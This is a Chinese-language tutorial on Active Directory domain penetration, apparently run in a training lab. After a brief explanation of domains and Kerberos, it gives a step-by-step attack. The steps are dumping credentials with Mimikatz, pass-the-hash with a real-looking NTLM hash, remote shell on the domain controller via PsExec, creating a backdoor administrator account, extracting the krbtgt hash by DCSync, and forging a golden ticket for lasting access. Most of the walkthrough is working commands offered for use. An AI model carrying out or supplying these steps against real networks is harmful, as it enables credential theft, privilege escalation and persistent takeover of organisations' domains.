域渗透（Domain penetration）

一、域的简介

域其实就是一些计算机所组成的。一个电脑也能是一个域，一堆电脑也可以是一个域。

域控账号可以登录域内任意主机

二、Windows认证协议 - Kerberos

在域中一台电脑上要登录另一台的用户，需要一个通信证，这个通行证就叫做票据。例如：你用域管账户登录

三、域渗透 - 哈希传递

域控管理员会用自己的域控账号登录客户机，那么我们就可以抓取到域控的账号和密码。但是密码并不一定抓取到的都是明文，如果是Windows server 2012以上版本或者是打了KB2871997补丁就会抓取不到明文密码，虽然有密文，但是密文是是不可逆的，基本上不可能解开

在登陆其他用户的时候，也会这样去计算类似的情况，所以你用哈希值就可以去登陆同密码的服务器，然后因为这里是域控的账号密码，那么你可以直接用这个去登陆域控

四、域渗透 - 黄金票据

krbtgt账户其实就是那个KDC秘钥分发中心用的超管密码，我们拿着那个的票据，去访问客户机，客户机会认为我们是KDC秘钥分发中心，所以直接给了最高的权限允许我们访问，一般管理员会修改域控机密码，但是很少有管理员会修改Krbtgt的密码。那我们看看怎么伪造这个黄金票据。

PsExec的作用

能够使用域控的cmd

五、实战

域

这里跳过内网渗透，写怎么拿到域控

mstsc登入

查看目标主机是否在域内

systeminfo 查看计算机信息
arp -a 查看内网ip
登入10.0.1.8

用systeminfo 可查看域为：zkaq.cn（通过域控管理员登陆才会有），由此证明上面的登陆是由域控登陆的（并不是说明我的就是域空账号，只是域控有登陆过）

猕猴桃基础命令
privilege::debug   提权
sekurlsa::logonpasswords   抓密码

取出哈希值，用哈希传递的办法直接构建密码去登陆
sekurlsa::pth /user:administrator /domain:"zkaq.cn" /ntlm:61465a991b168727b65b3644aab823cd  

弹出了一个cmd.exe，我们可以用以下命令先看看自己是否有权限

dir \\DC.zkaq.cn\c$（查看域控共享文件中的c盘里的内容）
\\：UNC路径（共享文件）
DC：登陆的主机名

将PsExec文件上传到远程桌面，在刚刚打开的cmd命令行中输入以下命令使其跳转到桌面

cd ../../
cd users
cd administrator
cd Desktop 

再输入以下系统命令获取目标的权限并弹出目标的cmd

PsExec.exe \\DC.zkaq.cn cmd

输入ipconfig查看IP地址，发现是10.0.1.6，我们连接的主机IP是10.0.1.8，所以我们拿到域控的地址

接着，我们添加用户abc，并将其加入到管理员群组

添加用户abc
net user abc a1b2c3!.qa /add
将abc加入管理员组
net localgroup administrators abc /add
查看abc是否在管理员组
net localgroup administrators

连接域控地址的远程桌面

连接成功，此时，我们如果想要长期的登陆有效，就需要制作一个黄金票据

.在10.0.1.6主机上的猕猴桃提权后写入以下命令

lsadump::dcsync /user:krbtgt

查看日志，提取出里面的sid和hashNTLM

sid：S-1-5-21-4098506371-3349406080-1400905760

hashNTLM：9f7afad7acc9f72b7e338b908795b7da

用以下命令制作票据

kerberos::golden /admin:administrator /domain:zkaq.cn /sid:S-1-5-21-4098506371-3349406080-1400905760 /krbtgt:9f7afad7acc9f72b7e338b908795b7da /ticket:951.kiribi

加载票据

kerberos::ptt 951.kiribi

再次输入以下命令查看是否有权限

/dir \\DC.zkaq.cn\c$